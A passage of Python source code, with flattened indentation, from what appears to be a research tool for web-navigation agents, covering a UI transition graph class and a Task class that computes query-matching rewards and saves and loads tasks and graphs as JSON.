utg_node["font"] = "14px Arial red"
utg_nodes.append(utg_node)
for state_transition in self.G.edges():
from_state = state_transition[0]
to_state = state_transition[1]
actions = self.G[from_state][to_state]["actions"]
action_short_descs = []
action_list = []
for action_str, action_id in sorted(actions.items(), key=lambda x: x[1]):
action_short_descs.append((action_id, action_str))
action_list.append({
"action_str": action_str,
"action_id": action_id
})
utg_edge = {
"from": from_state,
"to": to_state,
"id": from_state + "-->" + to_state,
"title": UTG.list_to_html_table(action_short_descs),
"label": ", ".join([str(x["action_id"]) for x in action_list]),
"actions": action_list
}
utg_edges.append(utg_edge)
utg = {
"nodes": utg_nodes,
"edges": utg_edges,
"num_nodes": len(utg_nodes),
"num_edges": len(utg_edges),
"test_date": self.start_time.strftime("%Y-%m-%d %H:%M:%S"),
"time_spent": (datetime.now() - self.start_time).total_seconds(),
"start_url": self.start_url,
"action_count": self.action_count,
"action_next_state_count": self.action_next_state_count,
"ineffective_action_strs": list(self.ineffective_action_strs)
}
return utg
def save(self, utg_dir=None):
"""
Output current UTG to a directory
"""
if not utg_dir:
utg_dir = self.utg_dir
if not utg_dir:
return
if not os.path.exists(utg_dir):
os.makedirs(utg_dir)
utg_file_path = os.path.join(utg_dir, "utg.js")
utg_file = open(utg_file_path, "w")
utg_dict = self.get_utg_dict()
utg_json = json.dumps(utg_dict, indent=1)
utg_file.write("var utg = \n")
utg_file.write(utg_json)
utg_file.close()
# Copy HTML/JS files
utg_index_dst = os.path.join(utg_dir, "index.html")
utg_stylesheets_dst = os.path.join(utg_dir, "stylesheets")
if not os.path.exists(utg_index_dst):
utg_index_src = os.path.join(".", "resources", "utg_visualization", "index.html")
shutil.copyfile(utg_index_src, utg_index_dst)
# utg_index_html = open(utg_index_src).read().replace("utg.js", self.name + "utg.js")
# open(utg_index_dst, "w").write(utg_index_html)
if not os.path.exists(utg_stylesheets_dst):
utg_stylesheets_src = os.path.join(".", "resources", "utg_visualization", "stylesheets")
shutil.copytree(utg_stylesheets_src, utg_stylesheets_dst)
def save_to_zip(self):
"""
output current UTG to a zip file
:return:
"""
if not self.zip_path:
return None
try:
utg_dict = self.get_utg_dict()
utg_json_str = "var utg = \n" + json.dumps(utg_dict, indent=1)
js_file_path = self.zip_path[:-4] + ".js"
with open(js_file_path, "w") as js_file:
js_file.write(utg_json_str)
zip_file = ZipFile(self.zip_path, mode="a", compression=COMPRESS_METHOD)
zip_file.writestr("utg.js", utg_json_str)
zip_file.close()
return zip_file
except:
return
@staticmethod
def load_from_zip(zip_path):
if not zip_path:
return None
utg_name = os.path.basename(zip_path)[:-len("utg.zip")]
try:
zip_file = ZipFile(zip_path, mode="r", compression=COMPRESS_METHOD)
utg_lines = zip_file.open("utg.js").readlines()[1:]
utg_body = "\n".join([line.decode() for line in utg_lines])
utg_dict = json.loads(utg_body)
utg = UTG.create_utg_from_dict(utg_name, utg_dict)
utg.zip_path = zip_path
return utg
except Exception as e:
print(e)
print("No UTG found in %s" % zip_path)
utg = UTG(name=utg_name)
utg.zip_path = zip_path
return utg
@staticmethod
def load_from_dir(utg_dir_path):
if not utg_dir_path:
return None
utg_dir_path = os.path.dirname(os.path.join(utg_dir_path, "utg.js"))
utg_name = os.path.basename(utg_dir_path)[:-len("utg")]
try:
utg_js_path = os.path.join(utg_dir_path, "utg.js")
utg_file = open(utg_js_path)
utg_body = "".join(utg_file.readlines()[1:])
utg_file.close()
utg_dict = json.loads(utg_body)
utg = UTG.create_utg_from_dict(utg_name, utg_dict)
utg.utg_dir = utg_dir_path
return utg
except Exception as e:
print(e)
print("No UTG found in %s" % utg_dir_path)
utg = UTG(name=utg_name)
utg.utg_dir = utg_dir_path
return utg
@staticmethod
def load_utgs_from_dir(utgs_dir):
utgs = []
if not utgs_dir:
return utgs
for root, dirs, files in os.walk(utgs_dir):
for dir in dirs:
if dir.endswith("_utg"):
dir_path = os.path.join(root, dir)
utg = UTG.load_from_dir(dir_path)
utgs.append(utg)
for f in files:
if f.endswith("_utg.zip"):
file_path = os.path.join(root, f)
utg = UTG.load_from_zip(file_path)
utgs.append(utg)
return utgs
@staticmethod
def create_utg_from_dict(utg_name, utg_dict):
utg = UTG(name=utg_name, **utg_dict)
for node in utg_dict["nodes"]:
state_str = node["state_str"]
state_url = node["label"]
action_strs = node["action_strs"]
tried_action_strs = node["tried_action_strs"]
utg.G.add_node(state_str, url=state_url, action_strs=action_strs, tried_action_strs=tried_action_strs)
for edge in utg_dict["edges"]:
old_state_str = edge["from"]
new_state_str = edge["to"]
for action_dict in edge["actions"]:
action_str = action_dict["action_str"]
action_id = action_dict["action_id"]
if (old_state_str, new_state_str) not in utg.G.edges():
utg.G.add_edge(old_state_str, new_state_str, actions={})
utg.G[old_state_str][new_state_str]["actions"][action_str] = action_id
utg.action_next_state_count = utg_dict["action_next_state_count"]
utg.ineffective_action_strs.update(utg_dict["ineffective_action_strs"])
utg.action_count = utg_dict["action_count"]
return utg
def get_action_coverages(self, state_or_str, n_steps):
if not state_or_str or n_steps <= 0:
return {}
if isinstance(state_or_str, State):
return {action: self.get_action_coverage(self._context_action_str(action, state_or_str), n_steps)
for action in state_or_str.possible_actions}
else:
action_strs = self.G.nodes[state_or_str]["action_strs"] if state_or_str in self.G.nodes else []
return {action_str: self.get_action_coverage(action_str, n_steps)
for action_str in action_strs}
def get_state_coverage(self, state_str, n_steps):
action_coverages = self.get_action_coverages(state_str, n_steps)
if not action_coverages:
return 1.0, 1.0
covered = total = 0.0
for action_covered, action_total in action_coverages.values():
covered += action_covered
total += action_total
return covered, total
def get_action_coverage(self, action_str, n_steps):
"""
get number of covered paths and total paths of given action in given number of steps
:param action_str:
:param n_steps:
:return: #covered, #total
"""
if action_str not in self.action_next_state_count:
return 0.0, 10.0 # 10 is the estimated number of actions per state
next_state_count = self.action_next_state_count[action_str]
next_state_count_sum = sum(next_state_count.values())
covered = total = 0.0
for state_str in next_state_count:
state_weight = float(next_state_count[state_str]) / next_state_count_sum
state_covered, state_total = self.get_state_coverage(state_str, n_steps - 1)
covered += state_weight * state_covered
total += state_weight * state_total
return covered, total
@staticmethod
def list_to_html_table(dict_data):
table = "<table class=\"table\">\n"
for (key, value) in dict_data:
table += "<tr><th>%s</th><td>%s</td></tr>\n" % (key, value)
table += "</table>"
return table
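# A Task wraps a natural-language query (query_words plus optional annotations) to be carried out
# starting from start_url. It tracks the action/state history, a per-task UTG, and the reward
# signal computed in compute_scores()/_evaluate() below.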
class Task:
def __init__(self, start_url, query_words=None, query_annotations=None, in_window_only=True, included_url_res=None,
target_url_res=None, target_text_res=None, target_state_str=None, necessary_actions=None,
demonstration=None, states_dir=None, name="", replayable=False, target_url=None, **kwargs):
self.name = name
self.logger = logging.getLogger("Task(%s)" % self.name)
self.query_words = query_words if query_words else []
        self.query_annotations = query_annotations if query_annotations else [""] * len(self.query_words)
if len(self.query_words) != len(self.query_annotations):
raise RuntimeError("The query length doesn't match the query annotation length: " + name)
self.use_annotations = GLOBAL_CONFIGS["use_annotations"]
self.start_url = start_url
self.step_limit = len(self.query_words_parsed) + 3
self.in_window_only = in_window_only
self.included_url_res = included_url_res if included_url_res else []
# self.included_url_res.append(Utils.get_host(start_url))
self.target_url_res = target_url_res if target_url_res else []
self.target_text_res = target_text_res if target_text_res else []
self.target_state_str = target_state_str
self.target_url = target_url
self.necessary_actions = necessary_actions
self.demonstration = demonstration
self.demo_tasks = None
self.demo_task = None
self.states_dir = states_dir
self.task_str = "%s in %s" % (" ".join(self.query_words), self.start_url)
self.replayable = replayable
self.utg = UTG(start_url=start_url, states_dir=self.states_dir, name=name)
self.__reset_progress()
def __reset_progress(self):
self.step = 0
self.action_history = []
self.state_history = []
self.state = None
self.reward = 0
self.total_reward = 0
self.reward_history = []
self.scores = [0.0] * len(self.score_items)
self.done = False
self.target_achieved = False
@lazy_property
def query_words_parsed(self):
words = [Utils.parse(word) for word in self.query_words]
return words
@lazy_property
def query_annotations_parsed(self):
if not self.use_annotations:
return [""] * len(self.query_annotations)
words = [Utils.parse(word) for word in self.query_annotations]
return words
@lazy_property
def all_words_parsed(self):
words = set(self.query_words_parsed + self.query_annotations_parsed)
for surrounding_word_list in self.surrounding_words_parsed:
for word in surrounding_word_list:
words.add(word)
if "" in words:
words.remove("")
return words
@lazy_property
def parameter_ids(self):
word_ids = []
for i, word in enumerate(self.query_words_parsed):
word_annotation = self.query_annotations[i]
if word_annotation:
word_ids.append(i)
return word_ids
@lazy_property
def parameter_annotations_parsed(self):
words = []
for i in self.parameter_ids:
words.append(self.surrounding_words_parsed[i])
return words
@lazy_property
def parameter_values(self):
words = []
for i in self.parameter_ids:
words.append(self.query_words[i])
return words
@lazy_property
def parameter_values_parsed(self):
words = []
for i in self.parameter_ids:
words.append(self.query_words_parsed[i])
return words
def get_action_parameter_index(self, action):
# get the index of the action word in the task query
if action.action_type in [Action.INPUT_TEXT, Action.SELECT]:
action_value = action.value_text_parsed
max_sim_idx = self.get_parameter_index(parameter=action_value)
if max_sim_idx > -1:
return max_sim_idx
return -1
def get_parameter_index(self, parameter):
max_sim = 0.5
max_sim_idx = -1
for i in self.parameter_ids:
entity_word_parsed = self.query_words_parsed[i]
similarity = Utils.text_similarity(entity_word_parsed, parameter)
if similarity > max_sim:
max_sim = similarity
max_sim_idx = i
return max_sim_idx
def get_parameter_surrounding_word_parsed(self, parameter):
para_idx = self.get_parameter_index(parameter)
if para_idx > -1:
surrounding_words_parsed = self.surrounding_words_parsed[para_idx]
if isinstance(surrounding_words_parsed, list):
if len(surrounding_words_parsed) > 0:
return surrounding_words_parsed[0]
else:
return surrounding_words_parsed
return ""
@lazy_property
def surrounding_words_parsed(self):
surrounding_words_list = []
for i, word in enumerate(self.query_words_parsed):
# surrounding_words_i = set()
# if i - 1 >= 0:
# prefix_word = self.query_words_parsed[i - 1]
# surrounding_words_i.add(prefix_word)
# if i + 1 < len(self.query_words_parsed):
# suffix_word = self.query_words_parsed[i + 1]
# if Utils.is_number(word) and (suffix_word not in EXCLUDE_QUERY_WORDS):
# surrounding_words_i.add(suffix_word)
# word_annotation = self.query_annotations_parsed[i]
# if word_annotation:
# surrounding_words_i.add(word_annotation)
# Heuristics added on 10/17/2019, merge surrounding words to one word
surrounding_words_i = []
if i - 1 >= 0:
prefix_word = self.query_words_parsed[i - 1]
surrounding_words_i.append(prefix_word)
word_annotation = self.query_annotations_parsed[i]
if word_annotation and word_annotation not in surrounding_words_i:
surrounding_words_i.append(word_annotation)
if i + 1 < len(self.query_words_parsed):
suffix_word = self.query_words_parsed[i + 1]
if Utils.is_number(word) and \
(suffix_word not in EXCLUDE_QUERY_WORDS) and \
(suffix_word not in surrounding_words_i):
surrounding_words_i.append(suffix_word)
# surrounding_words_i = [" ".join(surrounding_words_i)]
surrounding_words_i = [word for word in surrounding_words_i if word not in EXCLUDE_QUERY_WORDS]
surrounding_words_list.append(surrounding_words_i)
return surrounding_words_list
@lazy_property
def non_parameters_parsed(self):
words = set()
for i, word in enumerate(self.query_words_parsed):
if word in EXCLUDE_QUERY_WORDS:
continue
if self.query_annotations[i]:
words.add(self.query_annotations_parsed[i])
else:
words.add(word)
if "" in words:
words.remove("")
return sorted(words)
def snapshot(self, step=None):
task_snapshot = copy.copy(self)
if step is None or step == self.step:
task_snapshot.action_history = copy.copy(self.action_history)
task_snapshot.state_history = copy.copy(self.state_history)
task_snapshot.reward_history = copy.deepcopy(self.reward_history)
task_snapshot.scores = copy.copy(self.scores)
elif 0 <= step < self.step:
task_snapshot.__reset_progress()
task_snapshot.step = step
task_snapshot.state = self.state_history[step]
task_snapshot.state_history = copy.copy(self.state_history[:step])
task_snapshot.action_history = copy.copy(self.action_history[:step])
task_snapshot.reward_history = copy.deepcopy(self.reward_history[:step])
if len(task_snapshot.reward_history) > 0:
task_snapshot.reward, task_snapshot.total_reward, task_snapshot.scores = task_snapshot.reward_history[-1]
else:
self.logger.warning("Task.snapshot failed with step: " + step)
task_snapshot = None
return task_snapshot
def get_coverage(self):
return self.utg.get_action_coverage(Action.RESET, self.step_limit + 1)
def reset(self, state, update_utg=True):
assert isinstance(state, State)
self.__reset_progress()
if update_utg:
self.utg.add_init_state(state)
self.state = state
self._evaluate()
def update(self, action, new_state, update_utg=True):
assert isinstance(action, Action)
if update_utg:
self.utg.add_transition(action=action, old_state=self.state, new_state=new_state)
self.action_history.append(action)
self.state_history.append(self.state)
if new_state:
# Ensure self.state not being None
self.state = new_state
self._evaluate()
self.reward_history.append([self.reward, self.total_reward, self.scores])
self.step += 1
if new_state is None:
self.done = True
return self.reward, self.done
def get_action_coverages(self):
step_limit = self.step_limit - len(self.action_history)
return self.utg.get_action_coverages(self.state, step_limit)
def get_input_probability(self, input_text):
if self.state and self.state.actionable_text_set:
input_text = input_text.lower()
similarity = max([Utils.text_similarity(input_text, text)
for text in self.state.actionable_text_set])
return 1 - similarity
else:
return 1
@lazy_property
def score_items(self):
items = [
["step_count"],
["action_spatial_distance"],
["action_direction"]
# ["similarity_with_demo_actions"],
# ["similarity_with_demo_surrounding"]
]
items.append(["similarity_with_non_parameters", self.non_parameters_parsed])
for i in self.parameter_ids:
para_val = self.query_words_parsed[i]
para_anno = self.surrounding_words_parsed[i]
items.append(["similarity_with_parameters", para_val, para_anno])
# for i in range(len(entity_words) - 1):
# entity_word_i = entity_words[i]
# for j in range(i + 1, len(entity_words)):
# entity_word_j = entity_words[j]
# items.append(["distance_between_parameters", entity_word_i, entity_word_j])
return items
@property
def score_weights(self):
weights = []
for reward_item in self.score_items:
item = reward_item[0]
if item in REWARD_ITEM_WEIGHTS:
weights.append(REWARD_ITEM_WEIGHTS[item])
else:
weights.append(0)
return weights
def query_achieved_scores(self):
sim_non_para = 0.0
sim_paras = []
for i, reward_item in enumerate(self.score_items):
reward_key = reward_item[0]
if reward_key in ["similarity_with_non_parameters"]:
sim_non_para = self.scores[i]
elif reward_key in ["similarity_with_parameters"]:
sim_paras.append(self.scores[i])
return sim_non_para, sim_paras
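    # compute_scores first builds query_word_matches: for every parsed query word, a list of
    # (element, match score) pairs over the interacted elements, the current content elements and
    # previously clicked elements. It then emits one value per entry in score_items, in the same order.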
def compute_scores(self):
scores = []
# elements to compute reward with
inside_elements, outside_elements = self.state.interacted_elements(self.action_history)
previous_clicked_elements = []
previous_input_values = []
for action in self.action_history:
if action.element and action.action_type == Action.CLICK and action.element in outside_elements:
previous_clicked_elements.append(action.element)
if action.action_type == Action.INPUT_TEXT:
previous_input_values.append(action.value_text_parsed)
content_elements = self.state.content_elements
reward_elements = list(set(inside_elements + content_elements + previous_clicked_elements))
query_word_matches = {}
for i, word in enumerate(self.all_words_parsed):
word_matches = []
            is_input = word in previous_input_values
for ele in reward_elements:
score = ele.max_match_score(word, is_input=is_input)
# importance of 4 types of elements: input_text < content < clicked < select
if score > 0.5:
if is_input:
score *= 0.7 # penalize input value
if ele in previous_clicked_elements:
score *= 1.3
elif Action.SELECT in ele.acceptable_action_types:
score *= 1.6
word_matches.append((ele, score))
query_word_matches[word] = word_matches
for reward_item in self.score_items:
reward_key = reward_item[0]
if reward_key in ["step_count"]:
step_count = 0
for action in self.action_history:
# minimize the number of steps, but encourage submit actions
step_count += (0 if action.is_submit else 1)
scores.append(step_count)
elif reward_key in ["action_spatial_distance"]:
action_spatial_distance = 0
if len(self.action_history) > 1:
distances = []
for i in range(len(self.action_history) - 1):
ele_i = self.action_history[i].element
ele_j = self.action_history[i + 1].element
state_j = self.state_history[i + 1]
if ele_i and ele_j and state_j and state_j.get_element_by_locator(ele_i.xpath):
# if the two actions are in the same page
distance = ele_i.get_shortest_distance(ele_j)
if distance > DISTANCE_THRESHOLD:
distances.append(1.0)
if distances:
action_spatial_distance = np.sum(distances)
scores.append(action_spatial_distance)
elif reward_key in ["action_direction"]:
action_direction = 0
if len(self.action_history) > 1:
for i in range(len(self.action_history) - 1):
action_i = self.action_history[i]
ele_i = action_i.element
if not ele_i:
continue
word_idx_i = self.get_action_parameter_index(action_i)
for j in range(i + 1, len(self.action_history)):
action_j = self.action_history[j]
ele_j = action_j.element
state_j = self.state_history[j]
if not ele_j:
continue
if not state_j.get_element_by_locator(ele_i.xpath):
continue
word_idx_j = self.get_action_parameter_index(action_j)
if 0 <= word_idx_j < word_idx_i:
action_direction += 1.0
# if ele_i.position != ele_j.position \
# and ele_i.position[0] >= ele_j.position[0] \
# and ele_i.position[1] >= ele_j.position[1]:
# action_direction += 1.0
scores.append(action_direction)
elif reward_key in ["similarity_with_demo_actions"]:
if self.demo_task is None \
or len(self.demo_task.action_history) == 0 \
or len(self.action_history) == 0:
scores.append(0)
continue
match_scores = []
for demo_action in self.demo_task.action_history:
action_match_score = max([demo_action.match_score(action) for action in self.action_history])
match_scores.append(action_match_score)
for self_action in self.action_history:
                    action_match_score = max([self_action.match_score(action) for action in self.demo_task.action_history])
match_scores.append(action_match_score)
task_len = len(self.demo_task.action_history) + len(self.action_history)
similarity_with_demo_actions = sum(match_scores) / task_len
scores.append(similarity_with_demo_actions)
elif reward_key in ["similarity_with_demo_surrounding"]:
if not self.demo_task:
scores.append(0)
continue
demo_surrounding = self.demo_task.get_entity_surrounding()
self_surrounding = self.get_entity_surrounding()
if not demo_surrounding or not self_surrounding:
scores.append(0)
continue
match_scores = []
for demo_entity in demo_surrounding:
match_score = max([
Utils.text_similarity(demo_entity, self_entity) *
Utils.words_similarity(demo_surrounding[demo_entity], self_surrounding[self_entity])
for self_entity in self_surrounding])
match_scores.append(match_score)
for self_entity in self_surrounding:
match_score = max([
Utils.text_similarity(demo_entity, self_entity) *
Utils.words_similarity(demo_surrounding[demo_entity], self_surrounding[self_entity])
for demo_entity in demo_surrounding])
match_scores.append(match_score)
task_len = len(self.demo_task.action_history) + len(self.action_history)
similarity_with_demo_surrounding = sum(match_scores) / task_len
scores.append(similarity_with_demo_surrounding)
elif reward_key in ["similarity_with_non_parameters"]:
non_entity_words = reward_item[1]
match_scores = []
for word in non_entity_words:
similarity = max([0.0] + [score for ele, score in query_word_matches[word] if ele in content_elements])
match_scores.append(similarity)
if not match_scores:
match_scores = [0.0]
similarity_with_non_parameters = np.mean(match_scores)
scores.append(similarity_with_non_parameters)
elif reward_key in ["similarity_with_parameters"]:
para_val = reward_item[1]
para_annotations = reward_item[2]
para_scores = [0.0]
for v1_ele, v1_score in query_word_matches[para_val]:
para_scores.append(v1_score)
for annotation in para_annotations:
for v2_ele, v2_score in query_word_matches[annotation]:
dist = 1 if v1_ele == v2_ele else (1 + v1_ele.get_shortest_distance(v2_ele) / 50)
para_score = v1_score + v1_score / dist
para_scores.append(para_score)
similarity_with_parameter = max(para_scores)
scores.append(similarity_with_parameter)
elif reward_key in ["distance_between_parameters"]:
entity1 = reward_item[1]
entity2 = reward_item[2]
dists = [0.0]
for v1_ele, v1_score in query_word_matches[entity1]:
for v2_ele, v2_score in query_word_matches[entity2]:
if v1_ele == v2_ele:
continue
dist = v1_score * v2_score / (2 + v1_ele.get_shortest_distance(v2_ele) / 50)
if v2_ele.center[0] >= v1_ele.center[0] and v2_ele.center[1] >= v1_ele.center[1]:
dist *= 1.2
dists.append(dist)
distance_between_parameters = max(dists)
scores.append(distance_between_parameters)
else:
scores.append(0)
return scores
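    # _evaluate recomputes the scores, keeps an element-wise running maximum in self.scores, and
    # reports the change of the weighted total as the step reward. The episode ends when the state
    # leaves the included URLs, the step limit is reached, a FINISH action is taken, or no
    # possible actions remain.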
def _evaluate(self):
self.reward, self.done, self.target_achieved = 0, False, False
last_state = self.state_history[-1] if len(self.action_history) > 0 else None
last_action = self.action_history[-1] if len(self.action_history) > 0 else None
if not self.state or not self.state.url_matches(self.included_url_res):
self.done = True
self.reward = 0 - self.total_reward
self.total_reward = 0
return
# If last action is not a submit action, clear all accumulated scores
if last_state and last_action \
and (not last_action.is_submit):
# remove below conditions because they will lead to "submit-clear confusion"
# and (not last_action.action_type == Action.SELECT) \
# and (last_state.url not in self.state.url):
self.scores = [0.0] * len(self.score_items)
current_scores = self.compute_scores()
self.scores = np.max([self.scores, current_scores], axis=0)
total_reward = np.sum(np.multiply(self.score_weights, self.scores))
self.reward = total_reward - self.total_reward
self.total_reward = total_reward
n_matches, n_max_matches = self._target_match_ratio()
if n_matches == n_max_matches and n_max_matches > 0:
self.target_achieved = True
if len(self.action_history) >= self.step_limit \
or (last_action and last_action.action_type == Action.FINISH) \
or len(self.state.possible_actions) == 0:
self.done = True
return
def get_entity_surrounding(self):
entity_surrounding = {}
for action in self.action_history:
if action.action_type in [Action.INPUT_TEXT, Action.SELECT]:
entity = action.value_text_parsed
if len(entity) > 50:
continue
surrounding_words = action.surrounding_words_parsed
entity_surrounding[entity] = surrounding_words
return entity_surrounding
def get_action_usefulness(self, action):
"""
Evaluate the action's usefulness to this task
:param action: the action to evaluate
:return: the match score between the action and this task
"""
if action.element is None:
return 0.0
scores = [0.01]
for i, word in enumerate(self.all_words_parsed):
similarity = Utils.text_similarity(word, action.value_text_parsed)
scores.append(similarity)
return max(scores)
def get_preferred_actions(self):
"""
get the list of preferred actions in the context of current task
:return:
"""
restrict_action_space = GLOBAL_CONFIGS['action_restriction']
w_spatial = REWARD_ITEM_WEIGHTS['action_spatial_distance']
w_directional = REWARD_ITEM_WEIGHTS['action_direction']
preferred_actions = []
visited_state_strs = [state.state_str for state in self.state_history] + [self.state.state_str]
interacted_action_clusters = set([action.norm_action_str for action in self.action_history])
inputted_words = []
pending_input_words = copy.copy(self.query_words)
for action in self.action_history:
if action.action_type in [Action.INPUT_TEXT, Action.SELECT]:
inputted_word = action.value
inputted_words.append(inputted_word)
if inputted_word in pending_input_words:
pending_input_words.remove(inputted_word)
interacted_elements, _ = self.state.interacted_elements(self.action_history)
last_state = self.state_history[-1] if len(self.state_history) > 0 else None
last_action = self.action_history[-1] if len(self.action_history) > 0 else None
for action in self.state.possible_actions:
# TODO: If run on cache, comment following
if action.norm_action_str in interacted_action_clusters:
continue
# if self.utg.is_ineffective(action, self.state):
# continue
#
# action_ineffective = False
# next_state_weights = self.utg.get_next_state_weights(action, self.state)
# if next_state_weights \
# and len(next_state_weights) == 1 \
# and list(next_state_weights.keys())[0] in visited_state_strs:
# total_weight = sum(next_state_weights.values())
# max_weight = max(next_state_weights.values())
# if float(max_weight) / total_weight > 0.8:
# for state_str in next_state_weights:
# if next_state_weights[state_str] >= max_weight and state_str in visited_state_strs:
# action_ineffective = True
# break
# if action_ineffective:
# continue
# Constrain to the same input type
if action.action_type == Action.INPUT_TEXT:
current_value = action.element.ele_dict["value"] if "value" in action.element.ele_dict else None
if action.value == current_value:
continue
if self.get_input_probability(action.value) < 0.8:
continue
if not action.element.accepts_text(action.value):
continue
input_value_type = Utils.get_text_type(action.value)
if current_value:
if current_value in self.query_words:
continue
current_value_type = Utils.get_text_type(current_value)
if input_value_type != current_value_type:
continue
# else:
# if "date" in action.element.own_text and input_value_type != "time":
# continue
# Each parameter should be inputted only once.
# Heuristics added 10/15/2019
if action.action_type in [Action.INPUT_TEXT, Action.SELECT]:
if action.value in inputted_words:
continue
# Restrict to the same form
if w_spatial != 0: # OR suggested heuristics: if w_spatial is 0, don't restrict action space.
if last_action is not None \
and last_action.element is not None \
and last_action.element.parent_form is not None \
and not last_action.is_submit:
# last action is in a form
last_form = last_action.element.parent_form
current_form = action.element.parent_form
if current_form is None:
continue
if current_form.xpath != last_form.xpath:
continue
# if action.action_type == Action.CLICK and not action.is_submit:
# continue
# make sure press_enter action is taken right after input_text on the same element
if action.action_type == Action.PRESS_ENTER:
if last_action is None or last_action.element is None:
continue
if action.element.xpath != last_action.element.xpath:
continue
if restrict_action_space and w_directional != 0:
# If this is not a new state, the next action should be on the right side of or below previous actions
is_excluded = False
for interacted_element in interacted_elements:
previous_x, previous_y = interacted_element.center
x, y = action.element.center
if x == previous_x and y == previous_y:
continue
if x <= previous_x and y <= previous_y:
is_excluded = True
break
if is_excluded:
continue
preferred_actions.append(action)
return preferred_actions
def get_reward_str(self):
return "reward:%.2f total:%.2f scores:%s" % \
(self.reward, self.total_reward, ",".join(["%.2f" % s for s in self.scores]))
def get_tasklet(self):
pretty_trace = []
replay_trace = []
for i, action in enumerate(self.action_history):
reward, total_reward, scores = self.reward_history[i]
reward_str = "reward:%.2f total:%.2f scores:%s" % \
(reward, total_reward, ",".join(["%.2f" % s for s in scores]))
pretty_trace.append("%s, %s" % (action, reward_str))
replay_trace.append(action.replay_api)
success = self.target_achieved
report = "task:%s\n total_reward:%.2f success:%s\n" \
" score_items:\n\t%s\n pretty_trace:\n\t%s\n replay_trace:\n\t%s\n" % \
(self.task_str,
self.total_reward,
"Y" if success else "N",
"\n\t".join(
["%d. %.1f * %s" % (i, self.score_weights[i], item) for i, item in enumerate(self.score_items)]),
"\n\t".join(pretty_trace),
"\n\t".join(replay_trace))
return report
@staticmethod
def get_replay_trace_from_tasklet(tasklet):
replay_trace_offset = tasklet.find("replay_trace:") + 13
replay_trace_str = tasklet[replay_trace_offset:]
replay_trace = []
for line in replay_trace_str.splitlines():
line = line.strip()
if len(line) == 0:
continue
replay_trace.append(line)
return replay_trace
@staticmethod
def get_total_reward_from_tasklet(tasklet):
reward_line_re = r"total_reward:(\S+) success:"
m = re.search(reward_line_re, tasklet)
if m:
reward_str = m.group(1)
return float(reward_str)
else:
return None
def _target_match_ratio(self):
necessary_action_triples = Utils.parse_actions_to_triples(self.necessary_actions)
n_max_matches = len(self.target_text_res) + len(self.target_url_res) + len(necessary_action_triples)
if n_max_matches == 0:
# target not specified. Use the demonstration actions to identify success
necessary_action_triples = Utils.parse_actions_to_triples(self.demonstration)
n_max_matches = len(necessary_action_triples)
n_matches = 0
for target_text_re in self.target_text_res:
if re.search(target_text_re, self.state.text_in_window, re.IGNORECASE) \
or target_text_re in self.state.text_in_window:
n_matches += 1
for target_url_re in self.target_url_res:
if re.search(target_url_re, self.state.url, re.IGNORECASE) or target_url_re in self.state.url:
n_matches += 1
for action_type, value, target_locator_re in necessary_action_triples:
last_action_on_target = None
for action in self.action_history:
if action.action_type != action_type:
continue
if action.element is None:
continue
if action.element.locator is None:
continue
for target_locator_re_seg in target_locator_re.split(" || "):
if target_locator_re_seg in action.element.locator:
last_action_on_target = action
break
if last_action_on_target and last_action_on_target.value == value:
n_matches += 1
return n_matches, n_max_matches
def _is_visited(self, state):
for visited_state in self.state_history:
if state.same_as(visited_state):
return True
return False
def to_dict(self, as_demo=False):
if as_demo:
return {
"start_url": self.start_url,
"query_words": self.query_words,
"query_annotations": self.query_annotations,
"target_text_res": self.target_text_res,
"target_url_res": self.target_url_res,
"target_url": self.target_url,
"necessary_actions": self.necessary_actions,
"demonstration": self.demonstration
}
else:
return {
"start_url": self.start_url,
"step_limit": self.step_limit,
"query_words": self.query_words,
"query_annotations": self.query_annotations,
"in_window_only": self.in_window_only,
"included_url_res": self.included_url_res,
"target_url_res": self.target_url_res,
"target_text_res": self.target_text_res,
"target_state_str": self.target_state_str,
"demonstration": self.demonstration,
# "coverage": self.get_coverage(),
"state_history": [state.state_str for state in self.state_history],
"action_history": [action.replay_api for action in self.action_history],
"state": self.state.state_str,
"reward": self.reward,
"total_reward": self.total_reward,
"done": self.done,
"target_achieved": self.target_achieved
}
def save(self, task_dir, save_utg=False, overwrite=False, as_demo=False):
if not task_dir:
return
if not os.path.exists(task_dir):
os.makedirs(task_dir)
task_file_path = os.path.join(task_dir, self.name + "task.json")
if os.path.exists(task_file_path) and not overwrite:
self.name = self.name + "_"
self.utg.name = self.name
            self.save(task_dir, save_utg, overwrite=overwrite, as_demo=as_demo)
else:
task_json_file = open(os.path.join(task_dir, self.name + "task.json"), "w")
json.dump(self.to_dict(as_demo=as_demo), task_json_file, indent=2)
task_json_file.close()
for state in self.state_history + [self.state]:
state.save(state_dir=os.path.join(task_dir, "states"))
if save_utg:
self.utg.save(task_dir)
def load_utg(self, task_path):
task_dir = os.path.dirname(task_path)
task_name = os.path.basename(task_path)[:-len("task.json")]
self.utg = UTG.load_from_dir(utg_dir_path=os.path.join(task_dir, task_name + "utg.js"))
self.utg.states_dir = os.path.join(os.path.dirname(task_path), "states")
@staticmethod
def load(task_path, load_utg=False):
if not task_path.endswith("task.json") or not os.path.exists(task_path):
return None
task_dir = os.path.dirname(task_path)
task_name = os.path.basename(task_path)[:-len("task.json")]
task_json_file = open(task_path)
task_dict = json.load(task_json_file)
task_json_file.close()
task = Task(name=task_name, **task_dict)
if load_utg:
task.utg = UTG.load_from_dir(utg_dir_path=os.path.join(task_dir, task_name + "utg.js"))
task.utg.states_dir = os.path.join(os.path.dirname(task_path), "states")
if "state_history" in task_dict and "action_history" in task_dict:
task.reward = task_dict["reward"]
task.total_reward = task_dict["total_reward"]
task.done = task_dict["done"]
task.target_achieved = task_dict["target_achieved"]
states_str = os.path.join(task_dir, "states")
for i in range(len(task_dict["state_history"])):
state_str = task_dict["state_history"][i]
action_replay_api = task_dict["action_history"][i]
state = State.load(state_dir=states_str, state_str=state_str)
state.setup(task)
action = state.get_action(action_replay_api)
task.state_history.append(state)
task.action_history.append(action)
task.state = State.load(state_dir=states_str, state_str=task_dict["state"])
task.state.setup(task)
return task
@staticmethod
def load_tasks(task_path, load_utg=False):
tasks = []
if not task_path:
return tasks
if os.path.isdir(task_path):
for file_name in os.listdir(task_path):
if file_name.endswith("task.json"):
task = Task.load(task_path=os.path.join(task_path, file_name), load_utg=load_utg)
if task:
tasks.append(task)
if file_name.endswith("taskset.json"):
tasks.extend(Task.load_tasks(task_path=os.path.join(task_path, file_name), load_utg=load_utg))
elif task_path.endswith("task.json"):
tasks.append(Task.load(task_path=task_path, load_utg=load_utg))
elif task_path.endswith("taskset.json"):
taskset_name = os.path.basename(task_path)[:-len("taskset.json")]
taskset_json_file = open(task_path)
